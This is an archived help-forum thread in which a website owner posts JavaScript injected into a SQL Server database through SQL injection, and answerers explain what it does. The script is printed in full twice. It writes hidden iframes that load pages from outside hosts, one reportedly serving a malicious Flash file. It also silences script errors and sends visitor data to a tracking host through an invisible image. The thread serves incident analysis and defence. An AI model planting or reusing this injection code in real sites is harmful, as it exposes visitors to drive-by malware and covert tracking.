Solved

sql injection js script, can someone tell me what this is doing?

Posted on 2008-06-09
Last Modified: 2008-06-10
Our SQL Server DB was infected by some sort of SQL injection. I downloaded the .js file it references, and its contents are as follows:

// Sample of the script that the injected database content pulls into every page.
// Step 1: write an iframe for www.killpp.cn/456.htm into the document. At
// 100x1 pixels the frame is practically invisible, but the browser still
// loads whatever that page serves.
document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");

// Step 2: navigator.systemLanguage is an Internet Explorer property. When it
// equals 'zh-cn' the branch is empty, so nothing more is added; every other
// visitor also gets a zero-height iframe for www.qiqicc.cn/dj.htm.
if (navigator.systemLanguage=='zh-cn')
{

}
else{
document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");
}



// Step 3: a window.onerror handler that returns true suppresses the browser's
// script-error reporting, so failures in the injected code stay silent.
window.onerror=function(){return true};
// Step 4: write five <script> elements that make up a visit counter.
//  - They read document.referrer, top.document.referrer, the parent frame's
//    location and referrer, and the screen colour depth.
//  - They keep two cookies: AJSTAT_ok_pages (page count, expires after one
//    hour) and AJSTAT_ok_times (visit count, expires roughly a year later and
//    is incremented only when the page count is back at 1).
//  - They finally write a 0x0 <img> whose URL on web.51.la/go.asp carries the
//    counter id, both counts, timezone offset, colour depth, screen size,
//    referrer and page address, so the browser reports them with that request.
// Defender note: the three hostnames in this file are the strings to search
// for in database text columns and in proxy/DNS logs when scoping the incident.
document.write ('<script>var a3327tf="51la";var a3327pu="";var a3327pf="51la";var a3327su=window.location;var a3327sf=document.referrer;var a3327of="";var a3327op="";var a3327ops=1;var a3327ot=1;var a3327d=new Date();var a3327color="";if (navigator.appName=="Netscape"){a3327color=screen.pixelDepth;} else {a3327color=screen.colorDepth;}<\/script><script>a3327tf=top.document.referrer;<\/script><script>a3327pu =window.parent.location;<\/script><script>a3327pf=window.parent.document.referrer;<\/script><script>a3327ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3327ops=(a3327ops==null)?1: (parseInt(unescape((a3327ops)[2]))+1);var a3327oe =new Date();a3327oe.setTime(a3327oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3327ops+ ";path=/;expires="+a3327oe.toGMTString();a3327ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3327ot==null){a3327ot=1;}else{a3327ot=parseInt(unescape((a3327ot)[2])); a3327ot=(a3327ops==1)?(a3327ot+1):(a3327ot);}a3327oe.setTime(a3327oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3327ot+";path=/;expires="+a3327oe.toGMTString();<\/script><script>a3327of=a3327sf;if(a3327pf!=="51la"){a3327of=a3327pf;}if(a3327tf!=="51la"){a3327of=a3327tf;}a3327op=a3327pu;try{lainframe}catch(e){a3327op=a3327su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=1933327&tpages=\'+a3327ops+\'&ttimes=\'+a3327ot+\'&tzone=\'+(0-a3327d.getTimezoneOffset()/60)+\'&tcolor=\'+a3327color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3327of)+\'&vpage=\'+escape(a3327op)+\'" \/>\');<\/script>');

Could someone tell me exactly what this is doing?

Thanks in advance.
Question by:samic400
3 Comments
 
LVL 6

Expert Comment

by:ysfx
ID: 21744909
Looks like code that sites use to track traffic from a different domain. My guess is that this is an attempt to abuse sites that publish user input, such as blogs and feedback forms.
 
LVL 3

Accepted Solution

by:
NizzeK earned 500 total points
ID: 21748375
You are not alone with this problem:
http://www.daniweb.com/forums/post614041.html
This is a Chinese attempt to gather information for malicious use.
See: http://www.sudosecure.net/archives/83

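The code checks your pages and creates cookies (AJSTAT_ok_pages/AJSTAT_ok_times) with time stamp and availability information. An image tag is then written out in the guise of a utility, sending the collected information and identity to the data collector at web.51.la.
The code itself is not harmful, but it could reveal something unwanted. That applies to the statistics part; the hidden iframes at the top of the script load pages from other hosts into the visitor's browser and need to be assessed separately.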
I have reformatted the code to see the structure easier.

Best regards
Nils


// Reading copy of the injected script. The line breaks inside the quoted
// document.write() string below were added for legibility; in the file as
// served, that whole call is a single line.
//
// First statement: writes a 100x1 iframe for www.killpp.cn/456.htm, too small
// for a visitor to notice, although its content is still loaded.
document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");
 
// navigator.systemLanguage is an Internet Explorer property: a 'zh-cn' system
// takes the empty branch, all others additionally get a zero-height iframe
// for www.qiqicc.cn/dj.htm.
if (navigator.systemLanguage=='zh-cn')
{
 
}
else{
document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");
}
 
// Returning true from window.onerror hides script errors from the visitor.
window.onerror=function(){return true};
// The string written here contains five <script> elements:
//   1. declares the a3327* variables (page location, referrer, a Date, and
//      the screen colour depth taken from pixelDepth or colorDepth);
//   2-4. read top.document.referrer, window.parent.location and
//      window.parent.document.referrer, each in its own element so that an
//      error in one (for example a cross-frame access being refused) leaves
//      the "51la" / "" defaults from element 1 in place;
//   5a. reads and rewrites the AJSTAT_ok_pages cookie (incremented per page
//      load, expiry one hour ahead) and the AJSTAT_ok_times cookie
//      (incremented only when the page counter is 1, expiry a further 365
//      days ahead);
//   5b. picks the referrer and page address to report, then writes a 0x0
//      <img> whose web.51.la/go.asp URL carries counter id 1933327, both
//      counters, the timezone offset, colour depth, screen size, referrer
//      and page address.
// `try{lainframe}` only tests whether a variable of that name exists; when it
// does not, the reported page is window.location instead of the parent's.
document.write ('
	<script>
		var a3327tf="51la";
		var a3327pu="";
		var a3327pf="51la";
		var a3327su=window.location;
		var a3327sf=document.referrer;
		var a3327of="";
		var a3327op="";
		var a3327ops=1;
		var a3327ot=1;
		var a3327d=new Date();
		var a3327color="";
		if (navigator.appName=="Netscape")
			     {a3327color=screen.pixelDepth;} 
			else {a3327color=screen.colorDepth;}
	<\/script>
	<script>
		a3327tf=top.document.referrer;
	<\/script>
	<script>
		a3327pu =window.parent.location;
	<\/script>
	<script>
		a3327pf=window.parent.document.referrer;
	<\/script>
	<script>
		a3327ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));
		a3327ops=(a3327ops==null)?1:(parseInt(unescape((a3327ops)[2]))+1);
		var a3327oe =new Date();
		a3327oe.setTime(a3327oe.getTime()+60*60*1000);
		document.cookie="AJSTAT_ok_pages="+a3327ops+ ";
			path=/;
			expires="+a3327oe.toGMTString();
		a3327ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));
		if (a3327ot==null)
			     {a3327ot=1;}
			else {a3327ot=parseInt(unescape((a3327ot)[2])); a3327ot=(a3327ops==1)?(a3327ot+1):(a3327ot);}
		a3327oe.setTime(a3327oe.getTime()+365*24*60*60*1000);
		document.cookie="AJSTAT_ok_times="+a3327ot+";
			path=/;
			expires="+a3327oe.toGMTString();
	<\/script>
	<script>
		a3327of=a3327sf;
		if (a3327pf!=="51la")
			     {a3327of=a3327pf;}
		if(a3327tf!=="51la")
			     {a3327of=a3327tf;}
		a3327op=a3327pu;
		try{lainframe}catch(e){a3327op=a3327su;}
		document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=1933327&tpages=\'
			+a3327ops+\'&ttimes=\'+a3327ot+\'&tzone=\'+(0-a3327d.getTimezoneOffset()/60)+\'&tcolor=\'+a3327color+\'&sSize=\'
			+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3327of)+\'&vpage=\'+escape(a3327op)+\'" \/>\');
	<\/script>');

 
LVL 3

Expert Comment

by:NizzeK
ID: 21748394
But to start with, it gets page 456.htm, and that one has the malicious 4562.swf, see more:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080527?logdate=200808